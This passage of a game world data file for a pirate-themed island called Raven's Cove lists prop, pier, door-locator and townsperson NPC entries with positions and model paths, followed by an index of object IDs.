'models/props/Crane'}},'1274196102.14akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(110.199, -7.323, -58.919),'Pos': Point3(67.602, 395.779, 18.968),'RenderEffect': False,'Scale': VBase3(2.348, 2.348, 2.348),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_a'}},'1274196159.81akelts': {'Type': 'Pier','DisableCollision': False,'Holiday': '','Hpr': VBase3(-96.644, -0.964, -6.807),'Pos': Point3(349.82, -51.986, 5.56),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (1.0, 1.0, 1.0, 1.0),'Model': 'models/islands/pier_walkway'}},'1274196236.31akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(-88.954, 0.0, 0.0),'Pos': Point3(407.739, 269.496, -4.196),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1274196276.94akelts': {'Type': 'Cave_Props','DisableCollision': False,'Holiday': '','Hpr': VBase3(169.54, -26.818, -8.856),'Pos': Point3(275.639, 437.807, 106.873),'RenderEffect': False,'Scale': VBase3(1.326, 1.326, 1.326),'VisSize': '','Visual': {'Color': (0.58, 0.643, 0.773, 1.0),'Model': 'models/props/pir_m_prp_cav_rockGroup_c'}},'1274311689.13akelts': {'Type': 'Door Locator Node','Name': 'door_locator','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(0.044, -4.421, 5.0),'Scale': VBase3(1.0, 1.0, 1.0)},'1274311689.16akelts': {'Type': 'Door Locator Node','Name': 'door_locator_2','Hpr': VBase3(-180.0, 0.0, 0.0),'Pos': Point3(8.421, -1.87, 0.156),'Scale': VBase3(1.0, 1.0, 1.0)},'1274819841.73gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(32.042, -2.686, -4.673),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(4.269, 659.765, 21.452),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274825376.01gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(-8.055, -0.531, 0.64),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-5.432, 657.406, 21.487),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274825967.94gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(21.117, -1.468, -2.281),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(0.892, 659.11, 21.417),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274889994.04gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(-6.774, -0.369, -2.025),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-5.287, 657.7, 21.293),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274890958.87gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(26.696, 0.017, -1.906),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(3.173, 659.291, 21.404),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274892762.3gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(6.267, 2.685, -1.604),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-2.134, 658.838, 21.388),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274894542.99gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(14.639, 1.972, 0.235),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-2.075, 658.292, 21.352),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274906957.35gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(22.873, 1.313, -1.695),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(0.958, 659.437, 21.576),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274908180.63gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(9.927, 0.8, -0.026),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-1.216, 658.929, 21.478),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1274909359.61gcarranza': {'Type': 'Townsperson','Category': 'Commoner','AnimSet': 'default','AuraFX': 'None','CustomModel': 'None','GhostColor': 'None','GhostFX': 0,'Greeting Animation': '','HelpID': 'NONE','Holiday': '','Hpr': VBase3(-0.677, 0.761, -1.416),'Instanced World': 'None','Level': '37','Notice Animation 1': '','Notice Animation 2': '','Patrol Radius': '12.0000','Pos': Point3(-3.292, 658.423, 21.43),'PoseAnim': '','PoseFrame': '','Private Status': 'All','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Requires Quest Interest': False,'Respawns': True,'Scale': VBase3(1.0, 1.0, 1.0),'ShopID': 'PORT_ROYAL_DEFAULTS','Start State': 'Walk','StartFrame': '0','Team': 'Player','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0}},'Undockable': False,'Visibility': 'Grid','Visual': {'Model': 'models/islands/pir_m_are_isl_ravensCove'}}},'Layers': {},'ObjectIds': {'1271348547.01akelts': '["Objects"]["1271348547.01akelts"]','1271350320.82akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271350320.82akelts"]','1271353150.08akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353150.08akelts"]','1271353336.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353336.94akelts"]','1271353336.94akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353336.94akelts"]','1271353336.96akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353336.94akelts"]["Objects"]["1271353336.96akelts"]','1271353423.55akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353423.55akelts"]','1271353423.55akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353423.55akelts"]','1271353423.62akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353423.55akelts"]["Objects"]["1271353423.62akelts"]','1271353470.51akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353470.51akelts"]','1271353470.51akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353470.51akelts"]','1271353470.54akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353470.51akelts"]["Objects"]["1271353470.54akelts"]','1271975061.45akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271353423.55akelts"]["Objects"]["1271975061.45akelts"]','1271976903.32akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271976903.32akelts"]','1271976903.32akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1271976903.32akelts"]','1271976903.34akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271976903.32akelts"]["Objects"]["1271976903.34akelts"]','1273015161.27akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273015161.27akelts"]','1273016489.02akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273016489.02akelts"]','1273017013.14akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017013.14akelts"]','1273017013.14akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017013.14akelts"]','1273017082.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017082.44akelts"]','1273017082.44akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017082.44akelts"]','1273017082.47akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017082.44akelts"]["Objects"]["1273017082.47akelts"]','1273017082.48akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017082.44akelts"]["Objects"]["1273017082.48akelts"]','1273017199.25akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017199.25akelts"]','1273017199.25akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017199.25akelts"]','1273017340.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017453.02akelts"]["Objects"]["1273017340.64akelts"]','1273017453.02akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017453.02akelts"]','1273072887.39akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273072887.39akelts"]','1273072923.48akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273072923.48akelts"]','1273072952.05akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273072887.39akelts"]["Objects"]["1273072952.05akelts"]','1273073067.58akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073067.58akelts"]','1273073067.58akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073067.58akelts"]','1273073190.25akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073190.25akelts"]','1273073190.25akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073190.25akelts"]','1273073190.27akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073190.25akelts"]["Objects"]["1273073190.27akelts"]','1273073190.28akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073190.25akelts"]["Objects"]["1273073190.28akelts"]','1273073249.37akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073190.25akelts"]["Objects"]["1273073249.37akelts"]','1273073249.37akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073190.25akelts"]["Objects"]["1273073249.37akelts"]','1273074334.16akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273074334.16akelts"]','1273074421.59akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273074421.59akelts"]','1273074421.59akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273074421.59akelts"]','1273091457.33akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1271976903.32akelts"]["Objects"]["1273091457.33akelts"]','1273091459.09akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017199.25akelts"]["Objects"]["1273091459.09akelts"]','1273091460.78akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273017013.14akelts"]["Objects"]["1273091460.78akelts"]','1273091461.7akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273073067.58akelts"]["Objects"]["1273091461.7akelts"]','1273091585.2akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091585.2akelts"]','1273091830.78akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091830.78akelts"]','1273091831.92akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091831.92akelts"]','1273091832.89akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091832.89akelts"]','1273091845.5akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091845.5akelts"]','1273091851.12akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091851.12akelts"]','1273091865.31akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091865.31akelts"]','1273091868.48akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091868.48akelts"]','1273091870.05akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091870.05akelts"]','1273091872.62akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091872.62akelts"]','1273091875.31akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091875.31akelts"]','1273091877.31akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091877.31akelts"]','1273091882.56akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091882.56akelts"]','1273091884.67akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091884.67akelts"]','1273091886.73akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091886.73akelts"]','1273091888.0akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091888.0akelts"]','1273091891.72akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091891.72akelts"]','1273091893.66akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091893.66akelts"]','1273091899.75akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091899.75akelts"]','1273091901.5akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091901.5akelts"]','1273091902.91akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091902.91akelts"]','1273091904.2akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091904.2akelts"]','1273091905.59akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273091905.59akelts"]','1273092494.95akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273092494.95akelts"]','1273092504.59akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273092504.59akelts"]','1273092521.83akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273092521.83akelts"]','1273092820.69akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273092820.69akelts"]','1273092917.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273092917.44akelts"]','1273093125.0akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273093125.0akelts"]','1273093994.66akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273093994.66akelts"]','1273095685.5akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273095685.5akelts"]','1273096169.53akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096169.53akelts"]','1273096197.31akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096197.31akelts"]','1273096243.31akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096243.31akelts"]','1273096339.62akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096339.62akelts"]','1273096383.28akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096383.28akelts"]','1273096397.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096397.64akelts"]','1273096448.37akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096448.37akelts"]','1273096512.7akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096512.7akelts"]','1273096619.89akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096619.89akelts"]','1273096651.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096651.64akelts"]','1273096725.8akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096725.8akelts"]','1273096809.36akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096809.36akelts"]','1273096858.19akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096858.19akelts"]','1273096915.0akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096915.0akelts"]','1273096950.17akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273096950.17akelts"]','1273097195.03akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097195.03akelts"]','1273097229.58akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097229.58akelts"]','1273097295.27akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097295.27akelts"]','1273097340.39akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097340.39akelts"]','1273097382.52akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097382.52akelts"]','1273097482.17akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097482.17akelts"]','1273097538.3akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097538.3akelts"]','1273097599.77akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097599.77akelts"]','1273097723.86akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097723.86akelts"]','1273097816.3akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097816.3akelts"]','1273097904.06akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273097904.06akelts"]','1273098024.53akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098024.53akelts"]','1273098331.05akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098331.05akelts"]','1273098381.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098381.94akelts"]','1273098431.81akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098431.81akelts"]','1273098505.0akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098505.0akelts"]','1273098649.62akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098649.62akelts"]','1273098753.55akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098753.55akelts"]','1273098833.67akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098833.67akelts"]','1273098914.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273098914.44akelts"]','1273099012.62akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273099012.62akelts"]','1273099299.83akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273099299.83akelts"]','1273099391.45akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273099391.45akelts"]','1273099499.47akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273099499.47akelts"]','1273170865.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273170865.64akelts"]','1273170865.64akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273170865.64akelts"]','1273170904.98akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273170904.98akelts"]','1273170904.98akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273170904.98akelts"]','1273171053.22akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273171053.22akelts"]','1273171053.22akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273171053.22akelts"]','1273171125.73akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273171125.73akelts"]','1273171125.73akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273171125.73akelts"]','1273171584.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273171584.94akelts"]','1273171595.62akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273171595.62akelts"]','1273171752.0akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273171752.0akelts"]','1273179202.86akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273179202.86akelts"]','1273179694.97akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273179694.97akelts"]','1273179724.13akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273179724.13akelts"]','1273179750.3akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273179750.3akelts"]','1273180067.83akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180067.83akelts"]','1273180242.13akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180242.13akelts"]','1273180302.47akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180302.47akelts"]','1273180471.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180471.44akelts"]','1273180567.09akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180567.09akelts"]','1273180750.5akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180750.5akelts"]','1273180847.2akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180847.2akelts"]','1273180893.11akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180893.11akelts"]','1273180952.45akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180952.45akelts"]','1273180978.08akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273180978.08akelts"]','1273181103.83akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181103.83akelts"]','1273181198.34akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181198.34akelts"]','1273181245.44akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181245.44akelts"]','1273181306.47akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181306.47akelts"]','1273181408.98akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181408.98akelts"]','1273181477.33akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181477.33akelts"]','1273181519.3akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181519.3akelts"]','1273181555.27akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181555.27akelts"]','1273181669.42akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273181669.42akelts"]','1273271715.34akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273271715.34akelts"]','1273271715.34akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273271715.34akelts"]','1273271715.37akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273271715.34akelts"]["Objects"]["1273271715.37akelts"]','1273272701.96akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273272701.96akelts"]','1273272741.85akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273272741.85akelts"]','1273272849.65akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273272849.65akelts"]','1273509425.92akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273509425.92akelts"]','1273509449.95akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273509449.95akelts"]','1273509490.64akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273509490.64akelts"]','1273509537.2akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273509537.2akelts"]','1273509626.86akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273509626.86akelts"]','1273509669.45akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273509669.45akelts"]','1273509745.23akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273509745.23akelts"]','1273509836.28akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273509836.28akelts"]','1273510014.34akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510014.34akelts"]','1273510138.33akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510138.33akelts"]','1273510275.8akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510275.8akelts"]','1273510409.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510409.94akelts"]','1273510409.94akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510409.94akelts"]','1273510458.75akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510458.75akelts"]','1273510458.75akelts0': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510458.75akelts"]','1273510582.34akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510582.34akelts"]','1273510832.52akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510832.52akelts"]','1273510871.31akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510871.31akelts"]','1273510959.8akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273510959.8akelts"]','1273511060.0akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511060.0akelts"]','1273511068.05akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511068.05akelts"]','1273511082.69akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511082.69akelts"]','1273511091.59akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511091.59akelts"]','1273511149.67akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511149.67akelts"]','1273511175.94akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511175.94akelts"]','1273511189.3akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511189.3akelts"]','1273511201.41akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511201.41akelts"]','1273511206.09akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511206.09akelts"]','1273511211.73akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511211.73akelts"]','1273511217.41akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511217.41akelts"]','1273511251.84akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511251.84akelts"]','1273511296.48akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511296.48akelts"]','1273511387.89akelts': '["Objects"]["1271348547.01akelts"]["Objects"]["1273511387.89akelts"]','1273511391.06akelts': 